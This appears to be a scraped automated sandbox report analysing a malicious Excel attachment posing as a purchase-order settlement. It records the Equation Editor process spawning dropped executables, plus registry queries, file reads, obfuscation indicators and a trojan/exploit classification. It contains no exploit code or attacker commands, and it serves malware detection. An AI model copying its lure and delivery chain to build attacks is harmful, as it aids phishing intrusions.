Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_00403646

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$PO 65738963578 Revise Settlement.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR63D1.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@8/16@0/1

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004021AA CoCreateInstance,

4_2_004021AA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

4_2_00404ABB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\idcqz.exe

Code function: 5_2_00B52445 push ecx; ret

5_2_00B52458

Windows Analysis Report
PO 65738963578 Revise Settlement.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Windows Analysis Report PO 65738963578 Revise Settlement.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Windows Analysis Report
PO 65738963578 Revise Settlement.xlsx